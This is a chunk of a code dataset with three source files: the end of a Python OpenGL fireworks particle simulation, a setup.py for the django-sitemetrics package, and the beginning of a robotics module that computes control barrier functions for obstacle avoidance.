0.0, 1.0, 0.0, 0.0,\n 0.5, -0.5, -0.5, 1.0, 0.0, 1.0, 1.0, 0.0,\n 0.5, -0.5, 0.5, 1.0, 0.0, 1.0, 1.0, 1.0,\n -0.5, -0.5, 0.5, 1.0, 0.0, 1.0, 0.0, 1.0\n ]\n\n cubeIndicesData = [\n 0, 1, 2, 2, 3, 0,\n 4, 5, 6, 6, 7, 4,\n 8, 9, 10, 10, 11, 8,\n 12, 13, 14, 14, 15, 12,\n 16, 17, 18, 18, 19, 16,\n 20, 21, 22, 22, 23, 20\n ]\n\n self.vertices = np.array(cubeVerticesData, dtype = np.float32)\n self.indices = np.array(cubeIndicesData, dtype = np.uint32)\n\nclass Shader:\n def __init__(self, vsCode, fsCode):\n self.program = None\n\n self.program = compileProgram(compileShader(vsCode, GL_VERTEX_SHADER), compileShader(fsCode, GL_FRAGMENT_SHADER))\n\n def Use(self):\n glUseProgram(self.program)\n\n def SetMat4(self, name, value):\n loc = glGetUniformLocation(self.program, name)\n\n value = np.array(value, dtype = np.float32)\n glUniformMatrix4fv(loc, 1, GL_TRUE, value)\n\nclass Font:\n def __init__(self, fontName, size):\n self.face = ft.Face(fontName)\n self.face.set_char_size(size << 6)\n\n self.charsSize = (6, 16)\n self.charsAdvanceX = []\n\n self.maxCharHeight = 0\n self.charStartOffset = 32\n self.listOffset = -1\n self.texId = -1\n\n numChars = self.charsSize[0] * self.charsSize[1]\n\n self.charsAdvanceX = [0 for i in range(numChars)]\n\n advanceX, ascender, descender = 0, 0, 0\n charEndIndex = self.charStartOffset + numChars\n\n for c in range(self.charStartOffset, charEndIndex):\n self.face.load_char(chr(c), ft.FT_LOAD_RENDER | ft.FT_LOAD_FORCE_AUTOHINT)\n\n self.charsAdvanceX[c - self.charStartOffset] = self.face.glyph.advance.x >> 6\n\n advanceX = max(advanceX, self.face.glyph.advance.x >> 6)\n ascender = max(ascender, self.face.glyph.metrics.horiBearingY >> 6)\n descender = max(descender, (self.face.glyph.metrics.height >> 6) - (self.face.glyph.metrics.horiBearingY >> 6))\n\n self.maxCharHeight = ascender + descender\n maxTotalAdvanceX = advanceX * self.charsSize[1]\n maxTotalHeight = self.maxCharHeight * self.charsSize[0]\n\n exponent = 0\n bitmapDataSize = [0, 0]\n\n while maxTotalAdvanceX > math.pow(2, exponent):\n exponent += 1\n bitmapDataSize[1] = int(math.pow(2, exponent))\n\n exponent = 0\n\n while maxTotalHeight > math.pow(2, exponent):\n exponent += 1\n bitmapDataSize[0] = int(math.pow(2, exponent))\n\n self.bitmapData = np.zeros((bitmapDataSize[0], bitmapDataSize[1]), dtype = np.ubyte)\n\n x, y, charIndex = 0, 0, 0\n\n for r in range(self.charsSize[0]):\n for c in range(self.charsSize[1]):\n self.face.load_char(chr(self.charStartOffset + r * self.charsSize[1] + c), ft.FT_LOAD_RENDER | ft.FT_LOAD_FORCE_AUTOHINT)\n\n charIndex = r * self.charsSize[1] + c\n\n bitmap = self.face.glyph.bitmap\n x += self.face.glyph.bitmap_left\n y = r * self.maxCharHeight + ascender - self.face.glyph.bitmap_top\n\n self.bitmapData[y : y + bitmap.rows, x : x + bitmap.width].flat = bitmap.buffer\n\n x += self.charsAdvanceX[charIndex] - self.face.glyph.bitmap_left\n\n x = 0\n\n def GetTexId(self):\n return self.texId\n\n def GetListOffset(self):\n return self.listOffset\n\n def MakeFontTextureWithGenList(self):\n self.texId = glGenTextures(1)\n\n glBindTexture(GL_TEXTURE_2D, self.texId)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER)\n\n self.bitmapData = np.flipud(self.bitmapData)\n\n glTexImage2D(GL_TEXTURE_2D, 0, GL_ALPHA, self.bitmapData.shape[1], self.bitmapData.shape[0], 0,\n GL_ALPHA, GL_UNSIGNED_BYTE, self.bitmapData)\n\n dx = 0.0\n dy = self.maxCharHeight / float(self.bitmapData.shape[0])\n\n listStartIndex = glGenLists(self.charsSize[0] * self.charsSize[1])\n self.listOffset = listStartIndex - self.charStartOffset\n\n for r in range(self.charsSize[0]):\n for c in range(self.charsSize[1]):\n glNewList(listStartIndex + r * self.charsSize[1] + c, GL_COMPILE)\n\n charIndex = r * self.charsSize[1] + c\n\n advanceX = self.charsAdvanceX[charIndex]\n dAdvanceX = advanceX / float(self.bitmapData.shape[1])\n\n glBegin(GL_QUADS)\n glTexCoord2f(dx, 1.0 - r * dy), glVertex3f(0.0, 0.0, 0.0)\n glTexCoord2f(dx + dAdvanceX, 1.0 - r * dy), glVertex3f(advanceX, 0.0, 0.0)\n glTexCoord2f(dx + dAdvanceX, 1.0 - (r + 1) * dy), glVertex3f(advanceX, -self.maxCharHeight, 0.0)\n glTexCoord2f(dx, 1.0 - (r + 1) * dy), glVertex3f(0.0, -self.maxCharHeight, 0.0)\n glEnd()\n\n glTranslate(advanceX, 0.0, 0.0)\n\n glEndList()\n\n dx += dAdvanceX\n\n glTranslatef(0.0, -self.maxCharHeight, 0.0)\n dx = 0.0\n\nclass Firework:\n def __init__(self, externalForce):\n self.particlesBeforeExplosionVertices = []\n self.particlesBeforeExplosionTrailVertices = []\n self.particlesAfterExplosionVertices =[]\n self.particlesAfterExplosionTrailVertices = []\n\n self.externalForce = externalForce\n self.numTrailParticles = 20\n self.trail = False\n\n posInterval = 30.0\n\n particleBeforeExplosionPos = glm.vec3(0.0, 0.0, 0.0)\n particleBeforeExplosionPos.x = (random.random() - 0.5) * posInterval\n particleBeforeExplosionPos.y = -10.0\n particleBeforeExplosionPos.z = (random.random() - 0.5) * posInterval\n\n self.particlesBeforeExplosion = Particle(self.externalForce, particleBeforeExplosionPos, False, self.numTrailParticles)\n self.particlesAfterExplosion = []\n\n self.color = [random.random(), random.random(), random.random()]\n\n self.numParticlesAfterExplosion = 100\n self.exploded = False\n\n self.VAO = glGenVertexArrays(4)\n self.VBO = glGenBuffers(4)\n\n self._InitializeVertexArray()\n\n def SetTrail(self, value):\n self.trail = value\n\n def Update(self, deltaTime):\n if self.exploded == False:\n self.particlesBeforeExplosion.Update(deltaTime)\n\n particlesBeforeExplosionVel = self.particlesBeforeExplosion.GetVelocity()\n\n if particlesBeforeExplosionVel.y < 0.0:\n self.exploded = True\n\n self.Explode()\n else:\n numCurrentParticlesAfterExplosion = len(self.particlesAfterExplosion)\n\n for i in range(numCurrentParticlesAfterExplosion - 1, -1, -1):\n self.particlesAfterExplosion[i].Update(deltaTime)\n\n if self.particlesAfterExplosion[i].Done():\n self.particlesAfterExplosion.pop(i)\n\n def Explode(self):\n for i in range(self.numParticlesAfterExplosion):\n particlesBeforeExplosionPos = self.particlesBeforeExplosion.GetPosition()\n self.particlesAfterExplosion.append(Particle(self.externalForce, particlesBeforeExplosionPos, True, self.numTrailParticles))\n\n def Done(self):\n if self.exploded == True and len(self.particlesAfterExplosion) == 0:\n return True\n else:\n return False\n\n def Draw(self):\n glPushAttrib(GL_COLOR_BUFFER_BIT | GL_ENABLE_BIT | GL_POINT_BIT)\n\n glEnable(GL_POINT_SMOOTH)\n glEnable(GL_BLEND)\n\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n if self.exploded == False:\n glPointSize(5.0)\n \n particlesBeforeExplosionPos = self.particlesBeforeExplosion.GetPosition()\n\n self.particlesBeforeExplosionVertices[0] = particlesBeforeExplosionPos.x\n self.particlesBeforeExplosionVertices[1] = particlesBeforeExplosionPos.y\n self.particlesBeforeExplosionVertices[2] = particlesBeforeExplosionPos.z\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[0])\n glBufferSubData(GL_ARRAY_BUFFER, 0, self.particlesBeforeExplosionVertices.itemsize * 3, self.particlesBeforeExplosionVertices)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(self.VAO[0])\n glDrawArrays(GL_POINTS, 0, 1)\n\n if self.trail == True:\n particlesBeforeExplosionTrailPos = self.particlesBeforeExplosion.GetTrailPosition()\n\n alphaInterval = 1.0 / self.numTrailParticles\n\n for i in range(self.numTrailParticles):\n self.particlesBeforeExplosionTrailVertices[i * 7 + 0] = particlesBeforeExplosionTrailPos[i].x\n self.particlesBeforeExplosionTrailVertices[i * 7 + 1] = particlesBeforeExplosionTrailPos[i].y\n self.particlesBeforeExplosionTrailVertices[i * 7 + 2] = particlesBeforeExplosionTrailPos[i].z\n\n self.particlesBeforeExplosionTrailVertices[i * 7 + 6] = 1.0 - (i * alphaInterval)\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[1])\n glBufferSubData(GL_ARRAY_BUFFER, 0, self.particlesBeforeExplosionTrailVertices.nbytes, self.particlesBeforeExplosionTrailVertices)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(self.VAO[1])\n glDrawArrays(GL_POINTS, 0, 1 * self.numTrailParticles)\n\n glBindVertexArray(0)\n else:\n glPointSize(2.0)\n\n numCurrentParticlesAfterExplosion = len(self.particlesAfterExplosion)\n\n for i in range(numCurrentParticlesAfterExplosion):\n particlesAfterExplosionPos = self.particlesAfterExplosion[i].GetPosition()\n particlesAfterExplosionLifespan = self.particlesAfterExplosion[i].GetLifespan()\n\n self.particlesAfterExplosionVertices[i * 7 + 0] = particlesAfterExplosionPos.x\n self.particlesAfterExplosionVertices[i * 7 + 1] = particlesAfterExplosionPos.y\n self.particlesAfterExplosionVertices[i * 7 + 2] = particlesAfterExplosionPos.z\n\n self.particlesAfterExplosionVertices[i * 7 + 6] = particlesAfterExplosionLifespan\n\n if self.trail == True:\n particlesAfterExplosionTrailPos = self.particlesAfterExplosion[i].GetTrailPosition()\n\n alphaInterval = particlesAfterExplosionLifespan / self.numTrailParticles\n\n for j in range(self.numTrailParticles):\n self.particlesAfterExplosionTrailVertices[(i * self.numTrailParticles * 7) + (j * 7) + 0] = particlesAfterExplosionTrailPos[j].x\n self.particlesAfterExplosionTrailVertices[(i * self.numTrailParticles * 7) + (j * 7) + 1] = particlesAfterExplosionTrailPos[j].y\n self.particlesAfterExplosionTrailVertices[(i * self.numTrailParticles * 7) + (j * 7) + 2] = particlesAfterExplosionTrailPos[j].z\n\n self.particlesAfterExplosionTrailVertices[(i * self.numTrailParticles * 7) + (j * 7) + 6] = particlesAfterExplosionLifespan - (j * alphaInterval)\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[2])\n glBufferSubData(GL_ARRAY_BUFFER, 0, self.particlesAfterExplosionVertices.nbytes, self.particlesAfterExplosionVertices)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(self.VAO[2])\n glDrawArrays(GL_POINTS, 0, self.numParticlesAfterExplosion)\n\n if self.trail == True:\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[3])\n glBufferSubData(GL_ARRAY_BUFFER, 0, self.particlesAfterExplosionTrailVertices.nbytes, self.particlesAfterExplosionTrailVertices)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(self.VAO[3])\n glDrawArrays(GL_POINTS, 0, numCurrentParticlesAfterExplosion * self.numTrailParticles)\n\n glBindVertexArray(0)\n\n glPopAttrib()\n\n def _InitializeVertexArray(self):\n particlesBeforeExplosionVerticesData = []\n particlesBeforeExplosionTrailVerticesData = []\n particlesAfterExplosionVerticesData = []\n particlesAfterExplosionTrailVerticesData = []\n\n for i in range(1):\n particlesBeforeExplosionVerticesData.append(0.0)\n particlesBeforeExplosionVerticesData.append(0.0)\n particlesBeforeExplosionVerticesData.append(0.0)\n\n #particlesBeforeExplosionVerticesData.append(self.color[0])\n #particlesBeforeExplosionVerticesData.append(self.color[1])\n #particlesBeforeExplosionVerticesData.append(self.color[2])\n particlesBeforeExplosionVerticesData.append(random.random())\n particlesBeforeExplosionVerticesData.append(random.random())\n particlesBeforeExplosionVerticesData.append(random.random())\n particlesBeforeExplosionVerticesData.append(1.0)\n\n for j in range(self.numTrailParticles):\n particlesBeforeExplosionTrailVerticesData.append(0.0)\n particlesBeforeExplosionTrailVerticesData.append(0.0)\n particlesBeforeExplosionTrailVerticesData.append(0.0)\n\n #particlesBeforeExplosionTrailVerticesData.append(self.color[0])\n #particlesBeforeExplosionTrailVerticesData.append(self.color[1])\n #particlesBeforeExplosionTrailVerticesData.append(self.color[2])\n particlesBeforeExplosionTrailVerticesData.append(random.random())\n particlesBeforeExplosionTrailVerticesData.append(random.random())\n particlesBeforeExplosionTrailVerticesData.append(random.random())\n particlesBeforeExplosionTrailVerticesData.append(1.0)\n\n for i in range(self.numParticlesAfterExplosion):\n particlesAfterExplosionVerticesData.append(0.0)\n particlesAfterExplosionVerticesData.append(0.0)\n particlesAfterExplosionVerticesData.append(0.0)\n\n #particlesAfterExplosionVerticesData.append(self.color[0])\n #particlesAfterExplosionVerticesData.append(self.color[1])\n #particlesAfterExplosionVerticesData.append(self.color[2])\n particlesAfterExplosionVerticesData.append(random.random())\n particlesAfterExplosionVerticesData.append(random.random())\n particlesAfterExplosionVerticesData.append(random.random())\n particlesAfterExplosionVerticesData.append(1.0)\n\n for j in range(self.numTrailParticles):\n particlesAfterExplosionTrailVerticesData.append(0.0)\n particlesAfterExplosionTrailVerticesData.append(0.0)\n particlesAfterExplosionTrailVerticesData.append(0.0)\n\n particlesAfterExplosionTrailVerticesData.append(random.random())\n particlesAfterExplosionTrailVerticesData.append(random.random())\n particlesAfterExplosionTrailVerticesData.append(random.random())\n #particlesAfterExplosionTrailVerticesData.append(self.color[0])\n #particlesAfterExplosionTrailVerticesData.append(self.color[1])\n #particlesAfterExplosionTrailVerticesData.append(self.color[2])\n particlesAfterExplosionTrailVerticesData.append(1.0)\n\n self.particlesBeforeExplosionVertices = np.array(particlesBeforeExplosionVerticesData, dtype = np.float32)\n self.particlesBeforeExplosionTrailVertices = np.array(particlesBeforeExplosionTrailVerticesData, dtype = np.float32)\n self.particlesAfterExplosionVertices = np.array(particlesAfterExplosionVerticesData, dtype = np.float32)\n self.particlesAfterExplosionTrailVertices = np.array(particlesAfterExplosionTrailVerticesData, dtype = np.float32)\n\n glBindVertexArray(self.VAO[0])\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[0])\n glBufferData(GL_ARRAY_BUFFER, self.particlesBeforeExplosionVertices.nbytes, self.particlesBeforeExplosionVertices, GL_DYNAMIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.particlesBeforeExplosionVertices.itemsize * 7, ctypes.c_void_p(0))\n\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 4, GL_FLOAT, GL_FALSE, self.particlesBeforeExplosionVertices.itemsize * 7, ctypes.c_void_p(self.particlesBeforeExplosionVertices.itemsize * 3))\n\n glBindVertexArray(self.VAO[1])\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[1])\n glBufferData(GL_ARRAY_BUFFER, self.particlesBeforeExplosionTrailVertices.nbytes, self.particlesBeforeExplosionTrailVertices, GL_DYNAMIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.particlesBeforeExplosionTrailVertices.itemsize * 7, ctypes.c_void_p(0))\n\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 4, GL_FLOAT, GL_FALSE, self.particlesBeforeExplosionTrailVertices.itemsize * 7, ctypes.c_void_p(self.particlesBeforeExplosionTrailVertices.itemsize * 3))\n\n glBindVertexArray(self.VAO[2])\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[2])\n glBufferData(GL_ARRAY_BUFFER, self.particlesAfterExplosionVertices.nbytes, self.particlesAfterExplosionVertices, GL_DYNAMIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.particlesAfterExplosionVertices.itemsize * 7, ctypes.c_void_p(0))\n\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 4, GL_FLOAT, GL_FALSE, self.particlesAfterExplosionVertices.itemsize * 7, ctypes.c_void_p(self.particlesAfterExplosionVertices.itemsize * 3))\n\n glBindVertexArray(self.VAO[3])\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[3])\n glBufferData(GL_ARRAY_BUFFER, self.particlesAfterExplosionTrailVertices.nbytes, self.particlesAfterExplosionTrailVertices, GL_DYNAMIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.particlesAfterExplosionTrailVertices.itemsize * 7, ctypes.c_void_p(0))\n\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 4, GL_FLOAT, GL_FALSE, self.particlesAfterExplosionTrailVertices.itemsize * 7, ctypes.c_void_p(self.particlesAfterExplosionTrailVertices.itemsize * 3))\n\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(0)\n\nclass Particle:\n def __init__(self, externalForece, pos, exploded, numTrailParticles):\n self.acceleration = externalForece\n\n self.lifespan = 1.0\n self.exploded = exploded\n\n self.trailPos = []\n self.numTrailParticles = numTrailParticles\n\n if self.exploded == False:\n self.velocity = glm.vec3(0.0, random.random() * 30.0 + 15.0, 0.0)\n else:\n ranVec = glm.vec3(random.random() * 2 - 1.0, random.random() * 2 - 1.0, random.random() * 2 - 1.0)\n ranVec = glm.normalize(ranVec)\n ranVec *= random.randrange(1, 50)\n self.velocity = glm.vec3(ranVec.x, ranVec.y, ranVec.z)\n\n self.pos = glm.vec3(pos.x, pos.y, pos.z)\n\n for i in range(self.numTrailParticles):\n self.trailPos.append(glm.vec3(pos.x, pos.y, pos.z))\n\n def GetVelocity(self):\n return self.velocity\n\n def GetPosition(self):\n return self.pos\n\n def GetLifespan(self):\n return self.lifespan\n\n def GetTrailPosition(self):\n return self.trailPos\n\n def Update(self, deltaTime):\n if self.exploded == True:\n self.velocity *= 0.85\n self.lifespan -= 0.02\n\n self.velocity += self.acceleration * deltaTime\n self.pos += self.velocity * deltaTime\n\n newTrailPos = glm.vec3(self.pos.x, self.pos.y, self.pos.z)\n\n self.trailPos.pop()\n self.trailPos.insert(0, newTrailPos)\n\n def Done(self):\n if self.lifespan < 0.0:\n return True\n else:\n return False\n\ngSceneManager = SceneManager()\ngInputManager = InputManager()\n\n\ndef HandleWindowSizeCallback(glfwWindow, width, height):\n glViewport(0, 0, width, height)\n\n gSceneManager.SetDisplaySize(width, height)\n\ndef HandleKeyCallback(glfwWindow, key, scanCode, action, modes):\n if action == glfw.PRESS:\n if key == glfw.KEY_ESCAPE:\n glfw.set_window_should_close(glfwWindow, glfw.TRUE)\n\n if key == glfw.KEY_1:\n gInputManager.SetKeyState('1', True)\n if key == glfw.KEY_2:\n gInputManager.SetKeyState('2', True)\n\n if key == glfw.KEY_B:\n gInputManager.SetKeyState('B', True)\n if key == glfw.KEY_I:\n gInputManager.SetKeyState('I', True)\n if key == glfw.KEY_P:\n gInputManager.SetKeyState('P', True)\n if key == glfw.KEY_R:\n gInputManager.SetKeyState('R', True)\n if key == glfw.KEY_T:\n gInputManager.SetKeyState('T', True)\n\n if key == glfw.KEY_W:\n gInputManager.SetKeyState('W', True)\n elif key == glfw.KEY_S:\n gInputManager.SetKeyState('S', True)\n elif key == glfw.KEY_A:\n gInputManager.SetKeyState('A', True)\n elif key == glfw.KEY_D:\n gInputManager.SetKeyState('D', True)\n\n if action == glfw.RELEASE:\n if key == glfw.KEY_W:\n gInputManager.SetKeyState('W', False)\n elif key == glfw.KEY_S:\n gInputManager.SetKeyState('S', False)\n elif key == glfw.KEY_A:\n gInputManager.SetKeyState('A', False)\n elif key == glfw.KEY_D:\n gInputManager.SetKeyState('D', False)\n\ndef HandleCursorPosCallback(glfwWindow, xPos, yPos):\n if gSceneManager.GetPause() == True:\n return\n\n if gInputManager.GetMouseEntered() == False:\n gInputManager.SetLastMousePos([xPos, yPos])\n gInputManager.SetMouseEntered(True)\n\n lastPos = gInputManager.GetLastMousePos()\n xOffset = lastPos[0] - xPos\n yOffset = lastPos[1] - yPos\n\n gInputManager.SetLastMousePos([xPos, yPos])\n\n camera = gSceneManager.GetCamera()\n camera.ProcessMouseMovement(xOffset, yOffset)\n\n displaySize = gSceneManager.GetDisplaySize()\n\n mouseCheckInterval = 20\n\n if xPos < mouseCheckInterval:\n glfw.set_cursor_pos(glfwWindow, displaySize[0] - mouseCheckInterval, yPos)\n gInputManager.SetMouseEntered(False)\n elif xPos > displaySize[0] - mouseCheckInterval:\n glfw.set_cursor_pos(glfwWindow, mouseCheckInterval, yPos)\n gInputManager.SetMouseEntered(False)\n\n if yPos < mouseCheckInterval:\n glfw.set_cursor_pos(glfwWindow, xPos, displaySize[1] - mouseCheckInterval)\n gInputManager.SetMouseEntered(False)\n elif yPos > displaySize[1] - mouseCheckInterval:\n glfw.set_cursor_pos(glfwWindow, xPos, mouseCheckInterval)\n gInputManager.SetMouseEntered(False)\n\n gSceneManager.SetDirty(True)\n\ndef Main():\n displaySize = gSceneManager.GetDisplaySize()\n\n if not glfw.init():\n return\n\n glfw.window_hint(glfw.VISIBLE, glfw.FALSE)\n\n glfwWindow = glfw.create_window(displaySize[0], displaySize[1], \"Fireworks.Part 1\", None, None)\n\n if not glfwWindow:\n glfw.terminate()\n return\n\n videoMode = glfw.get_video_mode(glfw.get_primary_monitor())\n\n windowWidth = videoMode.size.width\n windowHeight = videoMode.size.height\n windowPosX = int(windowWidth / 2 - displaySize[0] / 2) - 250\n windowPosY = int(windowHeight / 2 - displaySize[1] / 2) - 50\n\n glfw.set_window_pos(glfwWindow, windowPosX, windowPosY)\n\n glfw.show_window(glfwWindow)\n\n glfw.set_input_mode(glfwWindow, glfw.CURSOR, glfw.CURSOR_DISABLED)\n\n glfw.make_context_current(glfwWindow)\n\n glfw.set_window_size_callback(glfwWindow, HandleWindowSizeCallback)\n\n glfw.set_key_callback(glfwWindow, HandleKeyCallback) \n \n glfw.set_cursor_pos_callback(glfwWindow, HandleCursorPosCallback)\n\n shader = Shader(vertexShaderCode, fragmentShaderCode)\n\n gSceneManager.InitializeOpenGL()\n gSceneManager.SetCamera(Camera())\n gSceneManager.MakeFont()\n #gSceneManager.AddObject(Firework(glm.vec3(0.0, -20.0, 0.0)))\n\n prjMat = []\n viewMat = []\n\n lastElapsedTime = glfw.get_time()\n deltaTime = 0.0\n\n while glfw.window_should_close(glfwWindow) == False:\n glfw.poll_events()\n\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n gSceneManager.AddObject(Firework(glm.vec3(0.0, -50.0, 0.0)))\n\n gSceneManager.Update(deltaTime)\n\n prjMat = gSceneManager.GetPerspectivePrjMat()\n viewMat = gSceneManager.GetViewMat()\n\n shader.Use()\n\n shader.SetMat4('prjMat', prjMat)\n shader.SetMat4('viewMat', viewMat)\n\n gSceneManager.DrawObjects()\n \n glUseProgram(0)\n\n gSceneManager.DrawProgramInfo(deltaTime)\n\n glfw.swap_buffers(glfwWindow)\n\n deltaTime = glfw.get_time() - lastElapsedTime\n lastElapsedTime = glfw.get_time()\n\n\nglfw.terminate()\n\n\nif __name__ == \"__main__\":\n Main()","repo_name":"acekcw/Application","sub_path":"Fireworks (Fireworks.P01).py","file_name":"Fireworks (Fireworks.P01).py","file_ext":"py","file_size_in_byte":42692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5761192895","text":"import os\nfrom setuptools import setup\nfrom sitemetrics import VERSION\n\n\nf = open(os.path.join(os.path.dirname(__file__), 'README.rst'))\nreadme = f.read()\nf.close()\n\nsetup(\n name='django-sitemetrics',\n version='.'.join(map(str, VERSION)),\n description='Reusable application for Django providing easy means to integrate site metrics counters into your sites',\n long_description=readme,\n author=\"Igor 'idle sign' Starikov\",\n author_email='idlesign@yandex.ru',\n url='http://github.com/idlesign/django-sitemetrics',\n packages=['sitemetrics'],\n include_package_data=True,\n zip_safe=False,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n ],\n)\n","repo_name":"sarutobi/django-sitemetrics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"24718532081","text":"#!/usr/bin/env python3\n\"\"\"\nBackend of active reference governor control law. Formulate CBFs.\n\nAuthor: Zhuolin Niu @ ERL\n\n\"\"\"\nimport cvxpy as cp\nimport numpy as np\n\nimport rospy\n\n\nclass RefGvnActiveGoal:\n \"\"\"\n Optimization module used for\n 1) computed CBF values of surrounding moving obstacles\n 2) formulated QCQP on constraints from CBFs and deltaE\n 3) solved QCQP for optimized local projected goal (lpg_star)\n \"\"\"\n\n def __init__(self, mo_list, gamma, kg, r_robot=0.33):\n \"\"\"\n INPUT\n mo_list list of moving obstacle information, including:\n p_mo 2d position [px, py] (m)\n v_mo linear velocity [vx, vy] (m/s)\n r_mo moving obstacle set radius\n gamma CBF class-K function parameter\n kg governor control gain\n r_robot robot circumscribed radius (default 0.33m for Jackal)\n \"\"\"\n\n self.mo_n = len(mo_list) # number of moving obstacles\n self.Ao = np.repeat(np.array([np.eye(2)]), self.mo_n, axis=0) # CBF normalization matrix\n\n self.r_mo = np.zeros((self.mo_n, 1, 1))\n self.p_mo = np.zeros((self.mo_n, 2, 1))\n self.v_mo = np.zeros((self.mo_n, 2, 1))\n\n self.gamma = gamma\n self.kg = kg\n self.r_robot = r_robot\n\n self.db_idx = [] # index list of driving backwards obstacles\n self.ho_log = np.empty(1) # safety value container\n\n self.update_movobs_info(mo_list)\n self.setup_cp_problem()\n self.qp_infeasible = False # QP status flag\n pass\n\n def update_movobs_info(self, mo_list):\n \"\"\"\n load current moving obstacle information\n \"\"\"\n self.r_mo[:, :, 0] = mo_list[:, 4:]\n self.p_mo[:, :, 0] = mo_list[:, 0:2]\n self.v_mo[:, :, 0] = mo_list[:, 2:4]\n\n self.R_mo = self.r_mo + self.r_robot\n self.Ao[:, 0:1, 0:1] = (1 / self.R_mo ** 2)\n self.Ao[:, 1:, 1:] = (1 / self.R_mo ** 2)\n return\n\n def form_cbf(self, x, g, ho_safe_limit=-0.2):\n \"\"\"\n INPUT\n x 4d robot state (2d position, 2d velocity) [zx, zy, wx, wy]\n g 2d governor state (2d position) [gx, gy]\n ho_safe_limit lowest CBF value to determine safe status as TRUE\n\n CBF equation:\n ho = (g-z)^T Ao (g-z) - (g-p)^T Ao (g-p) - 1 -2||g-p||/R_mo\n ho_dot = (partial_h/partial_g)*ug+(partial_h/partial_z)*w+(partial_h/partial_p)*v\n \"\"\"\n z, w = x[0:2], x[2:]\n\n p = self.p_mo\n v = self.v_mo\n\n d_gz = np.linalg.norm(g - z) # ||g-z||\n R_mo = self.R_mo\n gamma = self.gamma\n\n # augmented (higher dimension) arrays for matrix computation\n g_high_dim = np.repeat(np.array([np.array([g]).T]), self.mo_n, axis=0)\n z_high_dim = np.repeat(np.array([np.array([z]).T]), self.mo_n, axis=0)\n w_high_dim = np.repeat(np.array([np.array([w]).T]), self.mo_n, axis=0)\n\n # compute ho_dot values for all moving obstacles\n Ao = self.Ao\n if d_gz < 1e-3:\n bo = 0.0\n delta_gz = 0.0\n else:\n bo = 1.0 / (R_mo * d_gz)\n delta_gz = (2.0 * d_gz) / R_mo\n\n partial_d_partial_g = bo * (g_high_dim - z_high_dim)\n partial_d_partial_z = -partial_d_partial_g\n\n partial_ho_partial_g = 2 * Ao @ (g_high_dim - p) + 2 * Ao @ (z_high_dim - g_high_dim) - partial_d_partial_g\n partial_ho_partial_z = 2 * Ao @ (g_high_dim - z_high_dim) - partial_d_partial_z\n partial_ho_partial_p = -2 * Ao @ (g_high_dim - p)\n\n d_gp_sq = np.transpose(g_high_dim - p, (0, 2, 1)) @ (g_high_dim - p) # ||g-p||^2\n d_gp = np.sqrt(d_gp_sq)\n\n # compute ho values to select the least safe moving obstacle\n ho = (np.transpose(g_high_dim - p, (0, 2, 1)) @ Ao @ (g_high_dim - p)\n - np.transpose(g_high_dim - z_high_dim, (0, 2, 1)) @ Ao @ (g_high_dim - z_high_dim) - 1 - delta_gz)\n minh_ind = np.argmin(ho[:, 0, 0])\n\n # compute h_dot of the least safe moving obstacle\n # ho_dot = ho_dot_g*ug+ho_dot_f\n ho_dot_g = partial_ho_partial_g[minh_ind].T\n ho_dot_f = partial_ho_partial_z[minh_ind].T @ w_high_dim[minh_ind] + partial_ho_partial_p[minh_ind].T @ v[minh_ind]\n self.ho_dot_f = ho_dot_f[0, 0]\n self.ho_dot_g = ho_dot_g[0]\n\n # get CBF value from the least safe moving obstacle\n min_ho = ho[minh_ind, 0, 0]\n\n # compute classK\n self.classk_func_g = gamma * (min_ho ** 2)\n\n # get safety status\n g_safe = min_ho >= ho_safe_limit\n\n # store CBF value\n self.min_ho = min_ho\n self.ho_log = np.hstack((self.ho_log, min_ho))\n\n # update states and geometry distances of the system\n self.g = g\n self.z2d = z\n self.p = p\n self.r_gz = d_gz + self.r_robot # radius of robot-governor set\n self.d_gp = d_gp\n\n return g_safe\n\n # 